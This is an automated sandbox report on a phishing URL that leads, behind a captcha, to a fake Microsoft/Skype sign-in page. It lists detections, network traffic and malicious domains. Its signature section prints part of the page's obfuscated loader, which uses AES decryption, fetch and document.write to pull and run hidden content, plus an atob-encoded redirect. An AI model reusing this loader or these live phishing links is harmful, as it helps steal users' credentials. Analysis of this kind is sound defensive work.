Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://banhtrangutbinh.com/image/catalog/vqmod/arull.php?7120797967704b536932307464507a53744a4c53704a7a4d784c4c3872504c30764e7955784c5464464c7a732f564b386a524c3357717a4376564277413d

Overview

General Information

Sample URL:https://banhtrangutbinh.com/image/catalog/vqmod/arull.php?7120797967704b536932307464507a53744a4c53704a7a4d784c4c3872504c30764e7955784c5464464c7a732f564b386a524c3357717a4376564277413d
Analysis ID:1508798

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML page contains hidden URLs
HTML page contains suspicious javascript code
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://banhtrangutbinh.com/image/catalog/vqmod/arull.php?7120797967704b536932307464507a53744a4c53704a7a4d784c4c3872504c30764e7955784c5464464c7a732f564b386a524c3357717a4376564277413d MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1892,i,2740308608660524207,1062034826175762828,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • Phishing
  • Compliance
  • Networking
  • System Summary
  • Boot Survival

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: https://urbantechentertainmentfe.ru///514.php
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: window.location.href = atob(
Source: https://entertaingroovelifed.com.pl/uBynu/#5Matcher: Template: captcha matched
Source: https://entertaingroovelifed.com.pl/uBynu/#5Matcher: Template: captcha matched
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: async function ukase(wadi) { <!-- a car isfreedom with four wheels. --> var {a,b,c,d} = json.parse(wadi); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <span>a cars design is a testament to human ingenuity.</span> --> } (async () => { document.write(await ukase(await(await fetch(await ukase(atob(`eyjhijoicep0cerwak54m1zvrlbmodhjxc9mm1b1zelpvmxozw14s2zhq0zyetlvrwziwxfizklfxc9wmmf3ntdpvvbrzfgwiiwiyyi6imeynzmzzwrjyjm1y2ixn2rkmtdmngm4zdu5mje3zgvmiiwiyii6ijzlymzhmdi2y2mwmgfhyjlinzg1zdlinzdjota1othkogmxotayzwy5m2m0m2y5zmm3nwvlm2nkngringjjnmzhyti4nzgxmjgzmjvknju0o...
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: Number of links: 0
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: Total embedded image size: 45708
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: Base64 decoded: {"version":3,"sourceRoot":"/cfsetup_build/src/orchestrator/turnstile/templates","sources":["turnstile.scss"],"names":[],"mappings":"AAmCA;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IAEI;;EAGJ;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI...
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: Title: Continue your login does not match URL
Source: https://banhtrangutbinh.com/image/catalog/vqmod/arull.phpHTTP Parser: No favicon
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: No favicon
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: No favicon
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: No favicon
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: No <meta name="author".. found
Source: https://entertaingroovelifed.com.pl/uBynu/#5HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.31.67:443 -> 192.168.2.17:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:50249 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.17:50246 -> 162.159.36.2:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.67
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.67
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.67
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: global trafficDNS traffic detected: DNS query: banhtrangutbinh.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: entertaingroovelifed.com.pl
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: urbantechentertainmentfe.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 50271 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50249
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50250
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
Source: unknownNetwork traffic detected: HTTP traffic on port 50261 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
Source: unknownNetwork traffic detected: HTTP traffic on port 50258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50273 -> 443
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.31.67:443 -> 192.168.2.17:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:50249 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.win@17/6@26/186
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://banhtrangutbinh.com/image/catalog/vqmod/arull.php?7120797967704b536932307464507a53744a4c53704a7a4d784c4c3872504c30764e7955784c5464464c7a732f564b386a524c3357717a4376564277413d
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1892,i,2740308608660524207,1062034826175762828,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1892,i,2740308608660524207,1062034826175762828,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Scripting		1
Process Injection		1
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		1
Registry Run Keys / Startup Folder		1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://banhtrangutbinh.com/image/catalog/vqmod/arull.php?7120797967704b536932307464507a53744a4c53704a7a4d784c4c3872504c30764e7955784c5464464c7a732f564b386a524c3357717a4376564277413d0%Avira URL Cloudsafe

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
banhtrangutbinh.com
112.213.86.5
truefalse
    		unknown
    entertaingroovelifed.com.pl
    		104.21.64.96
    		truefalse
      		unknown
      a.nel.cloudflare.com
      		35.190.80.1
      		truefalse
        		unknown
        urbantechentertainmentfe.ru
        		188.114.97.3
        		truetrue
          		unknown
          code.jquery.com
          		151.101.130.137
          		truefalse
            		unknown
            cdnjs.cloudflare.com
            		104.17.24.14
            		truefalse
              		unknown
              challenges.cloudflare.com
              		104.18.95.41
              		truefalse
                		unknown
                www.google.com
                		216.58.212.164
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://banhtrangutbinh.com/image/catalog/vqmod/arull.phpfalse
                    		unknown
                    https://entertaingroovelifed.com.pl/uBynu/#5true
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      104.17.24.14
                      		cdnjs.cloudflare.comUnited States
                      		13335CLOUDFLARENETUSfalse
                      104.21.64.96
                      		entertaingroovelifed.com.plUnited States
                      		13335CLOUDFLARENETUSfalse
                      1.1.1.1
                      		unknownAustralia
                      		13335CLOUDFLARENETUSfalse
                      108.177.15.84
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      216.58.212.164
                      		www.google.comUnited States
                      		15169GOOGLEUSfalse
                      142.250.186.163
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      104.18.94.41
                      		unknownUnited States
                      		13335CLOUDFLARENETUSfalse
                      104.18.95.41
                      		challenges.cloudflare.comUnited States
                      		13335CLOUDFLARENETUSfalse
                      151.101.130.137
                      		code.jquery.comUnited States
                      		54113FASTLYUSfalse
                      239.255.255.250
                      		unknownReserved
                      		unknownunknownfalse
                      188.114.97.3
                      		urbantechentertainmentfe.ruEuropean Union
                      		13335CLOUDFLARENETUStrue
                      142.250.185.174
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      142.250.185.131
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      188.114.96.3
                      		unknownEuropean Union
                      		13335CLOUDFLARENETUSfalse
                      151.101.66.137
                      		unknownUnited States
                      		54113FASTLYUSfalse
                      142.250.186.110
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      35.190.80.1
                      		a.nel.cloudflare.comUnited States
                      		15169GOOGLEUSfalse
                      112.213.86.5
                      		banhtrangutbinh.comViet Nam
                      		45544SUPERDATA-AS-VNSUPERDATA-VNfalse

                      Private

                      IP
                      192.168.2.17

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1508798
                      Start date and time:2024-09-10 17:57:57 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                      Sample URL:https://banhtrangutbinh.com/image/catalog/vqmod/arull.php?7120797967704b536932307464507a53744a4c53704a7a4d784c4c3872504c30764e7955784c5464464c7a732f564b386a524c3357717a4376564277413d
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • EGA enabled
                      Analysis Mode:stream
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal56.phis.win@17/6@26/186
                      • Exclude process from analysis (whitelisted): svchost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.185.131, 108.177.15.84, 142.250.186.110, 34.104.35.123
                      • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                      • Not all processes where analyzed, report is missing behavior information
                      • VT rate limit hit for: https://banhtrangutbinh.com/image/catalog/vqmod/arull.php?7120797967704b536932307464507a53744a4c53704a7a4d784c4c3872504c30764e7955784c5464464c7a732f564b386a524c3357717a4376564277413d

                      LLM Input / Output

                      InputOutput
                      URL: https://entertaingroovelifed.com.pl/uBynu/#5 Model: jbxai
                      {
"brand":["CLOUDFLARE"],
"contains_trigger_text":false,
"prominent_button_name":"unknown",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
                      URL: https://entertaingroovelifed.com.pl/uBynu/#5 Model: jbxai
                      {
"brand":["Skype"],
"contains_trigger_text":true,
"prominent_button_name":"Next",
"text_input_field_labels":["Sign in",
"or Skype",
"No account? Create one!"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

                      Created / dropped Files

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 10 14:58:32 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2677
                      Entropy (8bit):3.995717842154182
                      Encrypted:false
                      SSDEEP:
                      MD5:A6231AEE090F402C74155EACCD110807
                      SHA1:6D129DD72AB914C5AEA88722F454CA54391146F0
                      SHA-256:AB3747AFA31A50FAB801C7FD600C6E564C0C2601FB8F72803163A4CBFAB694C7
